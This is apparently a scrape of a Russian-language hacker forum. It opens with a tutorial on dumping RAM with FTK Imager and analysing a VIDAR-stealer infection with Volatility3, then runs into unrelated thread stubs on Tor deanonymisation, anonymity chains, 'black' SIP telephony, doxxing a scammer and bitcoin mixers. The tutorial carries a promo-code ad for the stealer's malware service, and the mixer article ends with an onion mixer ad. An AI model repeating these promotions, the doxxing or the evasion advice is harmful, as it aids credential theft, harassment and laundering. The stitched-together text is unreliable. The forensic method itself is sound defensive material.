Одним из важных аспектов компьютерной безопасности является анализ оперативной памяти (ОЗУ), который позволяет выявлять и предотвращать различные угрозы. Снятие дампа ОЗУ – это процесс создания копии данных, находящихся в оперативной памяти компьютера в определенный момент времени. Эта копия может затем быть проанализирована на предмет наличия вредоносных программ, следов несанкционированного доступа или других потенциальных угроз.
Говоря про снятие дампа мы должны понимать пару аспектов
Всегоу вас может возникнуть две ситуации: когда скомпрометированный компьютер включен и когда он выключен:

Компьютер включен и пользователь залогенин
Компьютер выключен

Компьютер включен: Подключаем внешнее устройство запускаем специализированное ПО для снятие дампа
Компьютер выключен: Подключаем аппаратный блокиратор записи и снимаем обрзо Жесткого Диска

У каждой из этой ситуации есть свои плюсы и минусы.

Компьютер включен и пользователь залогенин: плюсы и минусы

Возможность получить образ вредоносного ПО
Возможность изучить текущее состояние системы
Возможность получить доступ к данным (Пароли и тд)
Злоумышленник может продолжить управлять систмой и подчистить следы
Неправильное взаимодействие с компьютером жертвы может повредить важные данные и потереть текущее состояние оперативной памяти (важное для расследования инцидента)

Компьютер выключен: плюсы и минусы

Нельза повредить данные (Возможность разом снять без проблем)
Нету дампа Оперативной памяти
Данные на жесткаче могут быть защифрованны
Снятие данных с жесткого диска может быть слишком долгим

Кстати про аппартаный блокиратор записи, он часто выглядит как чемоданчик шерлока холмса.

Именно такие чемоданчики есть у команды специалистов быстрого реагирования на компьютернные инциденты.

Мы теперь знаем все плюсы и минусы по снятию дампов при расследование инцедента, давайте теперь более специализрованно.
Нужно разобраться с софтом, Для снятия дампа оперативной памяти с Операционной системы Windows я буду использывать популярное ПО - **FTK imager,
FTK Imager - **Инструмент для создания образов дисков, который также может читать дампы памяти. FTK Imager позволяет пользователям просматривать и анализировать содержимое памяти в удобной форме.

Его непросто получить (актуальной версии), Я приложу файл под статью можете его скачать.

Для анализа дампа ОЗУ Я буду пользываться самым популярным ПО - Volatility
Volatility - Один из наиболее известных и широко используемых инструментов для анализа дампов памяти. Volatility поддерживает анализ дампов ОЗУ из разных операционных систем, включая Windows, Linux и Mac OS X. Он позволяет исследовать процессы, загруженные драйверы, сетевые соединения и многое другое.

Боевая практика - анализируем пораженный компьютер

Я поставил 2 виртуальные машины:

Windows 10 (Жертва)
Ubuntu OS (Криминалистическая тачка)

Для начала нам нужен образ вредонсоного ПО!
Мой дорогой друг Султан loadbaks предоставил мне доступ к своему стиллеру VIDAR и разрешил мне чутка помучить его стиллер своим эксперементом - Спасибо ему за предоставленную возможность!
Прочитать интервью с владельцом MaaS можете тут -> **ТЫК **
Кстати для всех кому интересны Стиллеры Султан дает скидочку для всех кто читает мои посты

loadbaks : Для всех кто прочитал статью, и напишет моему саппорту промокод Яшенька, получит +20% к первому пополнению баланса на нашем проекте.

Установим FTK Imager для снятие дампа ОЗУ

Screenshot 2024-02-24 202503.png

У меня есть боевая версия вируса, сделаю билд и заражу свою виртуалку под Windows 10 Видаром.

Поразив вирусом свою виртуалку запустим FTK Imager, перейдем в File -> Capture Memory и сделаем дамп

Кстати к этому моменту логи с моей виртуалки уже поступили в панель стиллера =)

Запустим процесс снятие дампа и дождемся окончания, (тут кстати есть возможность достать файл подкачки)

Мы получили два файла - Файл подкачки и сам дамп оперативной памяти

Перекинем эти файлы на криминалистическую тачку.
Теперь установим Volatility. Тут нужно понимать что классическая версия Volatility работает на питоне 2 версии и из-за того что питухон успел изменится 40 раз, легче всего взять Volatility3 (У него кстати есть свои приемущества в том смысле, что не нужно определять руками профиль ОС, в первой версии Volatility профиль - это точная версия операционной системы.)

Тут я думаю вы справитесь без меня.
Теперь по подробнее, Volatility это мощный инструмент который позволяет достать из целого дампа абсолютно все, начиная от Образа процесса, заканчивая скришотами, буффером, ключами реестра, выделенным местом в Оперативе и тд. Так же с использованием Volatility вы можете буквально детектировать инжект в легитимные процессы по типу explorer.exe или svchosts.exe (Имменно инжект)
Мы уже перетащили дамп на тачку, теперь давайте поймем что и как работает в Volatility.
У Volatility есть такая вещь как Plugins, Они позволяют определенным образом доставать все что нам нужно. Весь список описан в доккументации, я приложу ссылку внизу для вас. Так же можете посмотрть весь дефолтный список что и как используя флаг -h

Code:Copy to clipboard

python3 vol.py -h

Давайте изучим наш дамп. Флаг -f нужен для определения места дампа

Используя плагин $OS.pslist мы можем считать полностью весь список запущенных процессов на момент снятия дампа. Тут будет все что нам нужно PID - Process ID или же Offset

Offset в контексте оперативной памяти относится к смещению или позиции конкретного байта или группы байтов внутри блока памяти. Это числовое значение, которое указывает расстояние (обычно в байтах) от начала блока памяти до конкретного местоположения данных внутри этого блока.

Если мы хотим то можем получить дерево процессов используя плагин $OS.pstree

Мы можем получить СИДЫ $OS.getsid

Так же используя плагин $OS.netscan мы можем изучить текущее сетевые взаимодействие хоста с которого был снят дамп

Если хотим получить адреса реестровых файлов в памяти можем запустить windows.registry.hivelist

Дальше отталкиваясь от Оффсета который мы сдампили, мы можем получить все что хотим начиная от скришотов, заканчивая списком устройств подключенных к хосту/данные с автозагрузки хоста на момент снятие дампа. Но я не хочу вдаваться в подробности вы можете изучить это подробнее используя документацию, что касается всей истории с форензикой, вам нужно четко понимать устройство Операционнки которую изучаете, что где лежит.

Пробежавщись по реестру мы видим доступные нам пути, используя ключ мы можем узнать все что хотим. Давайте попробуем узнать чуть больше о системе.
Используя оффсет и ключ Control\SystemInformation мы получаем на руки информацию что это дамп с вирутальной машины так как информация о БИОСе хранивщайся в оперативной памяти явно укзаывает на Виртуальную Машину VMware

Мы можем так же посмотерть весь список сервисов на нашем хосте, Это хороший шаг возможно в вашем случаии вредонос закрепился через сервис.
Используем комманду windows.registry.printkey --offset 0x* --key 'ControlSet001\Services'

Это все базовые примеры, найти можно все - Вопрос как!

Я не будем усложнять себе положение, посмотрев список запущенных процессов на момент снятие дампа мы можем достать образ любого процесса.

Перед тем как забрать образ подозреваемого вредоноса - давайте посмотрим откуда он был запущен и с каким параметрамми.
Для этого используем windows.cmdline --pid *

Теперь мы можем констатировать факт запуска программы путь - "C:\Users\admin\Desktop\build.exe

Заберем образ подозрительного процесса вместе со всеми DDL (Это возможно понадобиться при дальнешем анализе)
Используя команду windows.dumpfiles --pid * (пид процесса который мы хотим забрать)

Обязательно укажите путь куда вы хотите получить ваши образы. Мы получаем образ нашего файла на руки.

Screenshot 2024-02-25 021433.png

Теперь мы можем сделать с ним все что хотим. Самое лучшее в таком моменте сразу бежать на ВирусТотал или Онлайн Песочницы по типу Эниран, но я этого делать не буду так как Загажу Билд Султана детектами на ВТ. Кстати всем кто арендует такой софт на заметку, если кто-то сольет билд на песочницы или ВТ то его очень легко найдут по ХЭШу и забанят ему учетку за слив билда. У всех юзеров такого софта уникальные билды с уникальными ХЭШАМИ, само собой все билды регулярно чекаются по ХЭШУ. Это кстати хороший трюк для безопасников который я прочитал в Книге:
Анализ вредоносных программ. Там бывший специалист Cisco по Безопасности объяснял как злоумышленники определяют "Изучают ли их вирус или нет" Вообщем не стоит сразу лить на ВТ билды если перед вами редкий экземпляр какого нибудь вредоноса, лучше руками изучить так как залив на ВТ злоумышленники сразу поймут что их вредонос уже попался в руки аналитика, кстати книгу советую прочитать!

Мы чуть отошли от темы, давайте изучим нашего друга.
Используя дефолтный Strings.

Screenshot 2024-02-25 021645.png

Пройдясь чуть ниже сразу становиться понятно что перед нами стиллер, это легко определить по передоваймым данным.

Мы отчетливво видим что собирается явная информация о компьютере такая как:
Процессор, Времеая Зона, Клавиатура, Оператиная память, Чип Видеокарты, и тд.
После чего мы можем сделать предположение что все это записывается в файл "information.txt"

Продолжая изучать образ процесса, мы видим такую интересную вещь:
В действительности владелец VIDAR делился в интервью со мной что данные добытые его стиллером передаются 2 путями. Steam или Telegram.
Так что тут Султан не обманул и реально его стиллер передает информацию через эти маршруты =)

Владелец VIDAR подробно о своем творении:

Так же добовляем в нашу таблицу IOC's сам стим профиль =0

Screenshot 2024-02-25 022233.png

Что касается таблицы IOC's.

Индикатор компрометации (Indicator of Compromise, IoC) — в сфере компьютерной безопасности наблюдаемый в сети или на конкретном устройстве объект (или активность), который с большой долей вероятности указывает на несанкционированный доступ к системе (то есть ее компрометацию). Такие индикаторы используются для обнаружения вредоносной активности на ранней стадии, а также для предотвращения известных угроз.

Вы должны записывать туда каждую подозрительную вещь, начиная от файлов, заканчивая айпи адрессами управляющих серверов, Необычные DNS-запросы, спикок узлов, профилей, сигнатуры, список Хэшей, подозрительных адерсов памяти и тд. Это нужно для подачи отчета с конкретными данными(пораженные хосты + IoC's)

Пробегаемся дальше по пути видя что собираются пароли с браузеров, замечаем запросы в БД =0
Я специально закрасил чувствительные данные стиллера (все таки мне его дали для теста)
В этих запросах видно буквально что куда помещается, и какие вообще есть в бд таблицы и столбцы.

Screenshot 2024-02-25 021921.png

Посмотрев на них можно уже поставить диагноз (не предположение как было раньше) Хост был атакован СТИЛЛЕРОМ!
Да возможно это выглядит глупо но я посторался показать базовое применение с анализом образа. Само собой я знал что на хосте был запущен стиллер, но при боевых задачах вы будете действовать примерно так. Увидели какой то процесс странный сдампили его образ с оперативы прошлись средствами детекта или же изучили вручной. При сложных атака вирусов с инжектом в легитимные процессы вам прийдется использвать apihooks и полноценно окунаться в реверс (тут кстати можете читать статьи yashechka, и особенно советую смотерть его прохождения crackme), так как вам прийдется смотреть на выделенное пространство и буквально доставать из процесса вредоносный код.
Конечно Если там условный РАТНИК или Ботнет то вам нужно смотрть на сетевые подключения хоста с момента снятие дампа и анализировать куда какой процесс пытается стучаться + Смотерть из списко автозагрузки + по реестру пытаться понять закрепился ли вирус имеено таким путем или же он буквально физическим файлом из автозагрузки запускается.

Это был всего лишь базовый пример как бывает в 99% Случаев и Я постарался показать как это выглядит почти всегда. Спасибо что прочитали до конца кстати проект с полигоном встал из-за последних новостей, я ищу активно пентестера который хочет попробывать свои силы vs SOC'a. Если интересно пиште в ПМ

Для тех кто хочет поддержать меня финансово:
BTC: bc1qxzw0u2hl40hxpw0zjz82zzkl5mgjtp9xwkex6f

Кстати весь этот проект я поднимаю в прямом эфире на твиче, подробнее тут:
ТГ: https://t.me/infosecetochto

Перед тем как начать хакерствовать: 860 страниц основ безопасности

ID: 676533bbb4103b69df37198a
Thread ID: 90792
Created: 2023-06-18T07:02:48+0000
Last Post: 2024-03-25T17:09:46+0000
Author: вавилонец
Prefix: Мануал/Книга
Replies: 22 Views: 3K

В этом пособии разбираются темы:
- почему надо пользоваться свободным ПО
- как это ^ сделать если ты только решил перейти с win на linux-подобные системы
- настройка виртуализации в виртуализации на базе KVM-QEMU
- настройки firewall, vnp, ssl-тунелей, iptable очень понятным языком
- много картинок + очень просто и доступными рядовому пользователю ПК словами

Не пугаться большого количества страниц - достаточно картинок
Не принимать как истину в последней инстанции, потому что пособие предназначено чтобы исключить ОСНОВНЫЕ вопросы безопасности, пример: описывается использование keePass - это лучше чем хранить пароли в текстовом файле на рабочем столе, но лучше зранить их в голое / при наличии хорошей памяти /

Рассматривать как ПЕРВЫЙ шаг к пониманию и осознанию анонимности и безопасности.

https://dropmefiles.com/1L644

Деанон мошенника

ID: 676533bbb4103b69df371cd4
Thread ID: 37307
Created: 2020-05-14T00:29:31+0000
Last Post: 2020-05-18T19:41:49+0000
Author: negg
Replies: 14 Views: 3K

Инста мошенник,очень тупой. У меня есть его киви номер, ну то есть его телефон,скорее всего левый так как я искал ничего нету на нем. И еще я вытащил сбер у него. То есть у меня есть его телефон + сбер. Город у него махачкала по телефону.

TOR не анонимен. Как деанонимизируют пользователей ТОР.

ID: 676533bbb4103b69df37199b
Thread ID: 109378
Created: 2024-02-29T19:54:53+0000
Last Post: 2024-03-05T13:13:07+0000
Author: ThorZirael
Prefix: Видео
Replies: 59 Views: 3K

TOR не анонимен, почему? - из-за массового контроля входных и выходных нод сети TOR. Почему это является проблемой и как благодаря контроля входных/выходных нод деанонимизируют пользователей - смотрите в видео.

Для тех кто любит текст:

Если нам не повезло и мы попали на входную и выходную ноду, которая контролируется службами = деанон нашего реального ip. Почему? Входная нода видет наш ip и вторую ноду, выходная нода видит конечный ресурс который мы посещаем и вторую ноду, т.е. вторую ноду видят и первая и третья нода, соответственно ей владеть не обязательно для деанона.
А теперь добавляем то, что цепочки ТОР меняются каждые 10-ть минут = получаем повышенный шанс поймать бинго - первую и третью "красную" ноду. + еще добавим постоянный NetFlow от заботливого провайдера и союз 14-ри глаз.

Реально интересно Ваше мнение.

Как удалить свой "цифровой след"?

ID: 676533bbb4103b69df3719b3
Thread ID: 83082
Created: 2023-03-02T22:27:35+0000
Last Post: 2024-02-05T08:04:58+0000
Author: BlackUFO
Replies: 37 Views: 3K

Всех приветствую!
Подскажите, как можно полностью(если это возможно) убрать себя из всех поисковых групп?
Не говорите про "удали страничку",так как дело не в этом. Недавно увлекся OSINT и решил начать с себя, что меня очень расстроило, так как я нашел достаточно информации вместе с адресом, фотографиями и тд.
В связи с этим вопрос, который, возможно, неправильно сформулирован, но всё же. Как себя удалить?

Aудит сетевой безопасности на Whonix

ID: 676533bbb4103b69df3719bb
Thread ID: 28637
Created: 2019-04-07T14:06:29+0000
Last Post: 2024-01-27T16:27:58+0000
Author: choppainblood
Replies: 18 Views: 3K

Поделитесь информацией о том, как провести аудит сетевой безопасности на Whonix. В частности как проверить не идет ли трафик налево, если Whonix стоит на VirtualBox на Windows 10

TOR: the good honeypot

ID: 676533bbb4103b69df3719d0
Thread ID: 96782
Created: 2023-08-28T22:15:53+0000
Last Post: 2023-12-25T21:10:26+0000
Author: basileusapoleiaoff
Replies: 50 Views: 3K

Tor is just a honeypot

Tor was created by the US millitary before going open source

Tor's still receiving funds from the US government

There are only around 8000 relays, and the number doesn't change over the past 5-10 years Because the number of relays are too small, so a large part of it can belong to someone, who want to spy on you.

Tor Has Issues With **Malicious Nodes

Security researchers actually found at least 110 Tor nodes that were snooping on user traffic and exposing devices to malware.**
this is from 2017 so Imagine now

Here’s the thing about Tor nodes – pretty much anyone can set up and operate them. (NSA for example)

The Government Has Many Ways to Compromise the Network

[https://www.washingtonpost.com/worl...0f08b6-2d05-11e3-8ade-a1f23cda135e_story.html](https://www.washingtonpost.com/world/national- security/secret-nsa-documents-show-campaign-against-tor-encrypted- network/2013/10/04/610f08b6-2d05-11e3-8ade-a1f23cda135e_story.html)

in 2014, there were even attacks against the Tor network that allowed the NSA (and any other agency, really) to de-anonymize around 81% of Tor users.

Most recently, the FBI apparently managed to de-anonymize Tor users to the point of finding their real IP addresses
[https://www.techtimes.com/articles/...ase-to-avoid-disclosing-tor- vulnerability.htm](https://www.techtimes.com/articles/200592/20170307/fbi- drops-child-pornography-case-to-avoid-disclosing-tor-vulnerability.htm)

Exit Nodes Don’t Really Encrypt Your Traffic

Tor bounces your traffic between multiple servers, decrypting a small layer of encryption with each bounce (hence the “Onion” in The Onion Router name). Well, when your traffic passes through the last server, there’s no more encryption.

Tor Devs Actually Cooperate With the US Government
Basically, it seems that one of Tor’s co-founders (Roger Dingledine) had no problem discussing cooperation with the DOJ and FBI. Oh, and** he also referenced installing “backdoors.”**

https://www.documentcloud.org/documents/4379303-Bbg-Tor-Emails-Stack-21.html

_“I contract for the United States Government to build anonymity technology for them and deploy it.”

“They need these technologies so that they can research people they’re interested in, so that they can have anonymous tip lines, so that they can buy things from people without other countries figuring out what they are buying, how much they are buying and where it is going, that sort of thing.”_

Roger Dingledine

Click to expand...

Just Google it tor History and see by you're own

“The United States government can’t simply run an anonymity system for everybody and then use it themselves only. Because then every time a connection came from it people would say, “Oh, it’s another CIA agent looking at my website,” if those are the only people using the network. So you need to have other people using the network so they blend together.” Roger Dingledine

Click to expand...

**Tor Can Leak IP Addresses (not even a joke )

Back in 2017, the Tor network had a serious flaw called TorMoil that leaked users’ IP addresses. While the devs eventually fixed that problem, there’s no telling when it will occur again.**

Government Agencies Don’t Even Need Warrants to Spy on Tor Users

[https://www.techtimes.com/articles/...-even-if-youre-using-tor-and-dont-ask- why.htm](https://www.techtimes.com/articles/167002/20160626/the-fbi-can-still- spy-on-you-even-if-youre-using-tor-and-dont-ask-why.htm)

Governments Can Actually Block the Tor Network
Like Venezuela, China, and Turkey even you're ISP provider
all they have to do is check the current list of Tor nodes, and use routers and firewalls to block them.

Tor Can’t Access Many Websites
-Specifically websites that use Cloudflare security software since it has a firewall option that blocks Tor traffic.

Развертывание “анонимной цепочки” любой сложности на Hyper-V

ID: 676533bbb4103b69df3719e1
Thread ID: 44758
Created: 2020-11-24T21:20:28+0000
Last Post: 2023-11-20T18:05:00+0000
Author: Benihowy
Prefix: Статья
Replies: 10 Views: 3K

Наверное никому не составит труда создать самую простую схему vpn=>tor. Для этих целей нужно всего лишь установить впн клиент и скачать тор браузер. После запуска трафик пойдет последовательно через впн, потом на ноды тора. А что если требуется усложнить схему? Например, параллельно вести два потока трафика и потом сливать их в один случайно разбрасывая запросы между нодами тора? Для этих целей воспользуемся виртуальными машинами. Разберем на моем примере

WAN – машина, которая непосредственно подключается к модему, она не имеет сети с хостом. Реальный адаптер реплицируется в виртуальную карточку, которая и подключена к этой машине.
R00 – машина, которая принимает трафик от роутеров. Связывается отдельной виртуальной сетью с ROUTE I, которая в свою очередь связывается аналогичным способом с WAN. То есть WAN видит только модем и ROUTE I. В общим понятно, как устроена адресация. На каждой машине установлен прокси сервер, вся связь осуществляется через него.
R11, R12 – виртуальный роутер, на котором установлено сразу две параллельные цепочки тора. Здесь также установлен прокси сервер, который принимая трафик (каждый запрос) случайным образом кидает его на одну из цепочек. От этих машин трафик идет на R00.
R21, R22 – аналогия предыдущему описанию, только вот трафик от тора идет не на R00, а случайным образом делится между R11 и R12.
ROUTE II – мы должны создать новую сеть, которая будет соединять последующие машины с роутерами. Поступающий трафик на эту машину делится между машинами R21, R22.
ROUTE III – Для чистого айпи нам понадобится впн, что ж, сделаем его.

Рассмотрим теперь выход в соц. сеть. ROUTE – VK принимает запросы от другой машины (на которой установлен сам браузер) и разрешает имена с помощью DOH (dns over https). Трафик от DOH идет на ROUTE II. Так как ВК очень прожорлив по запросам и требуется разрешать постоянно большое количество адресов (порядка 300к за 3 дня работы). Случались краши программы yogadns. Для этих целей я ввел днс-сервер, который разрешает из кэша. Визуально это все выглядело бы так

Как настроена виртуальная машина TOR BROWSER? Без использования снапшота не обойтись. После работы сбрасывает всю накопленную информацию к определённой точке, а именно до момента, когда не было браузера. Устанавливаем браузер каждый раз с нуля и обновляем. Добавляем побольше оперативной памяти и не скупимся на ядрах процессора.
Возьмем построение схемы для ютуба. Аналогичным образом трафик идет через виртуальные машины, но не через роутеры R, ведь нету смысла гонять трафик через тор, это приведет к большим задержкам и потери скорости. Для ютуба лучше всего подходит впн

Почему стоит разделять вк, ютуб, форумы, тор браузер и тд. Потому что, заходя с одного браузера на разные сервисы мы рискуем сообщить разную информацию этому сайту через скрипты, которые выполняются в браузере. Скрипт — это мощнейший инструмент, обеспечивающий работу сайтов подлежащим образом. Кроме этого они способны высосать информацию о браузере, историю, время и тд. Все это называют идентификаторами, у гугла их около 500. Чтобы абсолютно избежать утечек запускаем каждый браузер на отдельной машине. Браузер не должен быть запущен от имени администратора, а от обычного юзера. Более детально о браузере в статье «Анонимность и безопасность в сети ч5 – Анонимность. Браузер».
Это всего лишь пример того, как может быть организован доступ к сети. Можно ставить впн, тор, прокси, ssh, дедик куда угодно, изменять ttl и мак адреса, стоит только создать виртуальную машину и создать сеть, ну и прописать соответствующее правило. Кстати о сетях. Любая из машин должна быть по возможности экранирована от другой машины. Например, машина R11 может иметь такой же айпи адрес, как и машина ROUTE II или VK-MAIN. Но они находятся в разных виртуальных сетях, поэтому никак не могут видеть друг друга.

Нужно обезопасить сам хост. Не одна машина не должна иметь с ним связи через сеть. И сам не должен иметь выхода куда-либо. Разумеется, удалённое управление должно быть (если требуется) настроено на отдельной сетевой карте и не должно быть использовано для виртуальных машин. Само подключение интернета к хосту нужно ограничить, снять все галочки в свойствах этого подключения кроме виртуального свитча hyper-v. Если каким-то образом считаете, что и этого мала, то можно машину WAN перенести на какой-то отдельный реальный компьютер (даже маломощный старый «пенёк» сойдет). «Пенёк» будет соединятся с интернетом и через прокси принимать запросы от виртуальных машин, крутящихся на сервере виртуализации.
Разумеется, необходимо использовать файервол на критически важных виртуальных машинах. Таких как WAN, ROUTE III и на тех, которые управляются удаленно. То есть существует подключение к некоторым машинам с другой машины по rdp или vnc. Всем этим машинам добавляется сеть, в моем случае «VNC NETWORK» и эти машины по факту могут видеть друг друга через эту сеть. Чтобы этого не происходило блокируем трафик файерволом (использую agnitum).

SIP-телефония (Чёрная). Как создать, анонимность, безопасность.

ID: 676533bbb4103b69df3719f5
Thread ID: 73755
Created: 2022-09-29T09:45:11+0000
Last Post: 2023-10-22T07:26:27+0000
Author: dark ghost
Replies: 32 Views: 3K

Необходимо создать свою телефонию от А до Я? Что для этого нужно и как это вообще создается работает?
Звонки будут идти через софт на подобии (Zoiper and MircoSIP)
Что требуется:
-Запись всех разговоров
-Возможность выгружать разговоры(желательно mp3)
-Безопасность телефонии( хз как правильно это описать)
-Нормальный дозвон что бы был
-Запись разговора должна сохранятся на несколько дней
-Телефония должна обходить запреты со стороны оператора сотовой связи

------------------------------------------------------------------------
Прошу либо посказать как это всё сделать, либо дать литературу где это описывается простыми словами

Биткоин-миксеры: зачем они нужны и стоит ли ими пользоваться?

ID: 676533bbb4103b69df371a2b
Thread ID: 71538
Created: 2022-08-12T09:20:24+0000
Last Post: 2023-08-14T10:13:54+0000
Author: peacemaker
Prefix: Статья
Replies: 23 Views: 3K

Несмотря на эффективные средства криптографии, биткоин нельзя причислить к приватными монетам, таким как Zcash или Monero. Однако есть сервисы, которые позволяют добиться почти полной анонимности при транзакциях в сети Bitcoin — так называемые биткоин-миксеры. Кому могут понадобиться такие сервисы, пользуются ли ими законопослушные криптопользователи, какие сервисы наиболее популярны и как к ним относятся власти в разных странах, читайте в нашей статье.

Биткоин-миксеры — это специальные сервисы, которые в ходе транзакции смешивают биткоины разных пользователей, тем самым «запутывая» следы от отправителя до получателя.

Для добросовестных пользователей биткоин-миксеры могут быть средством, позволяющим сохранить анонимность. Ведь переводы в сети Bitcoin лишь псевдоанонимны — то есть благодаря криптографии в блокчейне не раскрываются личные данные пользователей, однако остаются следы, по которым все же можно выявить личность держателя криптовалюты. Например, когда вы выводите монеты с биржи, администрации нетрудно выяснить, какие адреса принадлежат именно вам, так как практически на всех регулируемых биржах сегодня внедрены процедуры KYC (идентификации личности).

Псевдоанонимность в Bitcoin также позволяет специальным программам идентифицировать реальных людей по их транзакциям. Подобные практики объединены под общим названием блокчейн-анализ, и существует немало компаний, которые специализируются на них: Chainalysis, Interga, Ciphertrace, Elliptic, Whitestream и другие.

В подобных сервисах блокчейн-анализа заинтересованы криптокомпании, которые стремятся соответствовать строгому финансовому регулированию в различных юрисдикциях, например, те же криптобиржи. Но наибольший спрос на блокчейн- анализ отмечен среди представителей государственных служб, а точнее, правоохранительных органов, которые стремятся обойти любые сервисы- анонимайзеры в попытках выяснить личность преступников.

Желание преступников оставаться анонимными — понятно. Но зачем биткоин-миксеры могут понадобиться законопослушным пользователям? Как минимум, чтобы обезопасить себя. Так, к приватности и защите персональных данных особо внимательно относятся крупные инвесторы и трейдеры. Ведь большие объемы крипто-активов в кошельках могут привлечь хакеров. Если владельца адреса удастся отследить в реальном мире, злоумышленники могут атаковать его с помощью фишинга или методов социальной инженерии, или даже напасть.

Какие бывают биткоин-миксеры?
Существует два основных типа миксеров — централизованные и децентрализованные (основаны на технологии CoinJoin).

Централизованные миксеры — традиционные сервисы, где смешивание монет происходит путем отправки транзакции и получения суммы обратно несколькими переводами от других пользователей, выбранных случайным образом. Если сервис используют много людей, то связать входящую и исходящую транзакцию одного и того же пользователя становится очень сложно.

Однако, в работе централизованных миксеров есть две проблемы:
1. Во-первых, необходимо доверие самому сервису. Ведь именно он обладает информацией о транзакциях пользователей и при желании может передать ее третьим лицам.
2. Во-вторых, небольшой шанс угодить в руки мошенников, которые только маскируются под миксер и просто собирают монеты пользователей, не отправляя ничего взамен, все-таки есть.
Децентрализованные миксеры — это анонимайзеры, где с помощью технологии CoinJoin решаются обе проблемы централизованных сервисов. Технология CoinJoin была предложена Bitcoin-разработчиком Грегори Максвеллом в 2013 году.

Как это работает? Для отправки обычной транзакции c биткоином нужно назначить входы (отправителей) и выходы (получателей). Для этого пользователь выбирает UTXO (Unspent Transaction Output) — неизрасходованные транзакции, которые получает от других адресов, и указывает выходы, куда будут направлены биткоины. Каждый вход подписывается приватными ключами.

В случае с CoinJoin несколько пользователей объединяют свои транзакции в одну путем объединения входов. В такой ситуации даже оператор миксера не сможет сказать, какому пользователю принадлежит тот или иной выход. Также сервис не может украсть монеты, поскольку для того, чтобы транзакция считалась действительной, все пользователи должны подписать свои входы приватным ключом, после чего ее невозможно будет видоизменить.

CoinJoin-миксеры применяются в кошельках Wasabi и Samourai, которые являются наиболее популярными биткоин-кошельками, «заточенными» под анонимность. Активировать миксер можно при отправке перевода из кошелька.

CoinJoin не обеспечивает полную анонимность, поскольку отправляющие и получающие адреса все равно отображаются в блокчейне. Кроме того, существуют инструменты деанонимизации транзакций, проходящих через такие миксеры.

Кто использует биткоин-миксеры
На первый взгляд, наибольшую популярность миксеры имеют у нечистых на руку пользователей. Однако на деле это такой же стереотип, как и то, что криптовалюты являются основным средством расчета в даркнете: выводы специалистов говорят о том, что биткоин-миксерами пользуются обычные держатели крипто-активов.

Большое исследование на эту тему в августе 2019 года выпустила компания Chainalysis, самая авторитетная организация в области блокчейн-анализа. Согласно выводам исследования:

Только 8.1% монет, используемых в миксерах, были ворованными.
Только 2.7% от оборота составляли биткоины, использованные в сделках на даркнет-площадках.
Наибольшая доля монет (40%) была отправлена в миксеры с кошельков бирж.
Свежее исследование другой компании по блокчейн-анализу, Elliptic, результаты которого были опубликованы в декабре 2020, подтверждает выводы Chainalysis, но лишь отчасти.

С одной стороны, компания обнаружила, что использование биткоинов в криминальных целях (по сравнению с другими способами использования) в этом году резко снизилось. С другой стороны, это может быть связано со слишком эффективной работой CoinJoin-миксеров, встроенных в приватные кошельки. По данным Elliptic, с 2018 года популярность таких кошельков среди преступников растет по сравнению с централизованными миксерами. Так, в 2020 году 13% всех биткоинов, отправленных в приватные кошельки, были связаны с преступными действиями, тогда как доля таких монет, отправленных в миксеры, упала до 3%:

Туманное будущее биткоин-миксеров
Несмотря на то, что криптовалюты были созданы в том числе и для сохранения анонимности пользователей, все более активное регулирование крипто-индустрии приводит к внедрению в нее стандартов финансовой отрасли и повышению прозрачности. Как следствие, под угрозой оказываются всевозможные инструменты для повышения приватности, включая анонимные криптовалюты, миксеры и кошельки на их основе.

В то же время предпринимаемые меры в разных странах отличаются. Так, власти Китая еще в начале 2019 года на законодательном уровне запретили блокчейн- разработчикам внедрять какие-либо средства для обеспечения полной анонимности пользователей.

На Западе такого жесткого запрета нет, но отдельные сервисы становятся объектами различных наказаний, в том числе и уголовных. Так, в мае 2019 года следственные органы Нидерландов совместно с «Европолом» закрыли крупный централизованный миксер Bestmixer. А в феврале этого года власти США арестовали основателя миксеров Helix и Coin Ninja Ларри Дин Хармона по обвинению в нарушении антиотмывочного законодательства. В итоге Хармон отделался штрафом, хотя и очень внушительным — $60 млн.

Но такие случаи нельзя назвать массовыми и они не затрагивают пользователей миксеров. Впрочем, есть и другое неприятное последствие использования миксеров.

Криптобиржи также вынуждены подчиняться все более строгому регулированию, в том числе в части идентификации пользователей. Чтобы не допустить притока «грязных» криптовалют (украденных или использованных для преступных целей) и анонимных пользователей, многие биржи используют программы для мониторинга транзакций. Некоторые из них могут отмечать побывавшие в миксерах биткоины как подозрительные и отклонять такие переводы.

Например, в 2019 году на таком основании были заморожены монеты одного из пользователей Binance, которые тот отправил из кошелька Wasabi. В 2020 году принимать криптовалюты, прошедшие через миксеры, отказалась и площадка Paxos Global.

Миксеры — эффективное средство сохранения приватности в псевдоанонимной среде Bitcoin. Скорее всего, миксеры и приватные кошельки на их основе продолжат свою работу в большинстве стран, однако так или иначе должны будут расстаться с концепцией полной анонимности, если это является требованием государства.

Поэтому в будущем ради анонимности многим криптопользователям, возможно, придется жертвовать доступом к популярным сервисам, таким как централизованные регулируемые криптобиржи.

P.S. взято с sigen.pro

В качестве безопасного и анонимного сервиса как кошелька там и миксера можете использовать наш сервис

http://ba72lxa2o2qxqixzeubnbookar2kssk42ds63m2qvlnr7b4oqtyayvad.onion/

Анонимность в Telegram

ID: 676533bbb4103b69df371a36
Thread ID: 57681
Created: 2021-10-13T16:32:50+0000
Last Post: 2023-07-24T04:45:23+0000
Author: blackswan
Replies: 31 Views: 3K

Наслаждайтесь этим, хороший учебник для того, чтобы оставаться анонимным в telegram

Деанонимизация биткойн-вымогателя с использованием теории вероятности

ID: 676533bbb4103b69df371a37
Thread ID: 38945
Created: 2020-06-27T12:34:44+0000
Last Post: 2023-07-21T17:29:07+0000
Author: trace
Prefix: Статья
Replies: 9 Views: 3K

ДЕАНОНИМИЗАЦИЯ БИТКОЙН-ВЫМОГАТЕЛЯ С ИСПОЛЬЗОВАНИЕМ ТЕОРИИ ВЕРОЯТНОСТИ

Доброго времени суток, ув. хакер/кардер/агент секретной службы/ФСБ (нужное подчеркнуть)

Как и большинство читателей, нас всех манит что-то нелегальное. Более 15 лет черно-серые схемы заработка полностью поглотили нас, но после арестов и экстрадиции близких дурзей, пришлось думать о каком-то более легальном направлении.

Данная история случилась в нашем офисе, который представлял из себя что-то средне между FX-TRENDом и трейдинг офисами господина Герчика, разница только в том что рынок крипты использовался для освоения инвесторских денег.

